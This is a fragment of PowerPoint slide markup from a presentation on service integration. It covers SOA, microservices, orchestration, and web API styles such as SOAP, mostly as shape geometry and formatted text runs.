                  <a:lnTo>
                    <a:pt x="0" y="196342"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28575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918203" y="4809744"/>
              <a:ext cx="5457825" cy="672465"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5457825" h="672464">
                  <a:moveTo>
                    <a:pt x="5345430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112013" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68419" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32813" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8804" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="560069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8804" y="603664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32813" y="639270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68419" y="663279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112013" y="672083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5345430" y="672083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5389024" y="663279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424630" y="639270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5448639" y="603664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5457444" y="560069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5457444" y="112013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5448639" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424630" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5389024" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5345430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3694366" y="6652259"/>
            <a:ext cx="9464040" cy="1724025"/>
            <a:chOff x="3694366" y="6652259"/>
            <a:chExt cx="9464040" cy="1724025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3708653" y="7183373"/>
              <a:ext cx="9435465" cy="1178560"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9435465" h="1178559">
                  <a:moveTo>
                    <a:pt x="0" y="196342"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5184" y="151315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19952" y="109986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43127" y="73531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73531" y="43127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109986" y="19952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151315" y="5184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196342" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9238742" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9283768" y="5184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9325097" y="19952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9361552" y="43127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9391956" y="73531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9415131" y="109986"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9429899" y="151315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9435084" y="196342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9435084" y="981697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9429899" y="1026720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9415131" y="1068049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9391956" y="1104507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9361552" y="1134915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9325097" y="1158094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9283768" y="1172866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9238742" y="1178052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196342" y="1178052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="151315" y="1172866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109986" y="1158094"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73531" y="1134915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43127" y="1104507"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19952" y="1068049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5184" y="1026720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="981697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="196342"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="28574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918203" y="6652259"/>
              <a:ext cx="5457825" cy="672465"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5457825" h="672465">
                  <a:moveTo>
                    <a:pt x="5345430" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="112013" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68419" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32813" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8804" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="560070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8804" y="603664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32813" y="639270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68419" y="663279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112013" y="672084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5345430" y="672084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5389024" y="663279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424630" y="639270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5448639" y="603664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5457444" y="560070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5457444" y="112014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5448639" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5424630" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5389024" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5345430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3895090" y="2085593"/>
            <a:ext cx="8627110" cy="60991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59435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Some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important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components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service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integration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are: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</a:pPr>
            <a:endParaRPr sz="3250">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="539750">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Service-Printed</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Architecture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(SOA)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="356235" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2085"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Atomic</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>defined</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>output</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>interfaces</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="356235" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Lo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-2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000" spc="-3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000" spc="-2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000" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ly</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>deco</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25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dirty="0" sz="2000" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-45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000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ed</a:t>
            </a:r>
            <a:endParaRPr sz="2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 MT"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr sz="2700">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="3112770">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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Microservices</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1835"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Each</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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7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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>capable</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>independent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>development</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>deployment</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-3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dirty="0" sz="20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7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0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5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dirty="0" sz="2000" spc="-7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000" spc="-165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dirty="0" sz="2000" spc="-25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dirty="0" sz="2000" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ly</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>de</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25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dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>led</a:t>
            </a:r>
            <a:endParaRPr sz="2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2600">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marR="3114040">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Services</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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integration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Orchestration</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2075"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Orchestration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>performs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>automating</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>automation</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110000"/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2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Orchestration</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>uses</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>APIs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>provision</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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1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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>workflow</a:t>
            </a:r>
            <a:endParaRPr sz="2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97628" y="306451"/>
            <a:ext cx="645858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95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="165">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Programming</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="95">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interfaces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06701" y="1756298"/>
            <a:ext cx="13042900" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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Application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programming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interfaces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means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by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which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external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entities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interact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with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service.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="2540">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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There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two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predominant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styles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creating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web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application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APIs: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4447" y="760476"/>
            <a:ext cx="9072372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421891" y="3317747"/>
            <a:ext cx="6553200" cy="772795"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6553200" h="772795">
                <a:moveTo>
                  <a:pt x="6424422" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78652" y="10120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37718" y="37718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10120" y="78652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="643889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10120" y="694015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37719" y="734949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78652" y="762547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128778" y="772667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6424422" y="772667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6474547" y="762547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6515481" y="734949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6543079" y="694015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="643889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6543079" y="78652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6515481" y="37718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6474547" y="10120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6424422" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0466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253233" y="3509517"/>
            <a:ext cx="488886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Simple</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="220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Object</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Protocol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(SOAP)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308847" y="3317747"/>
            <a:ext cx="6553200" cy="772795"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6553200" h="772795">
                <a:moveTo>
                  <a:pt x="6424421" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128777" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78652" y="10120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37719" y="37718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10120" y="78652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="643889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10120" y="694015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37719" y="734949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78652" y="762547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128777" y="772667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6424421" y="772667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6474547" y="762547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6515481" y="734949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6543079" y="694015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="643889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6553200" y="128777"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6543079" y="78652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6515481" y="37718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6474547" y="10120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6424421" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="0466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071609" y="3509517"/>
            <a:ext cx="502539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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
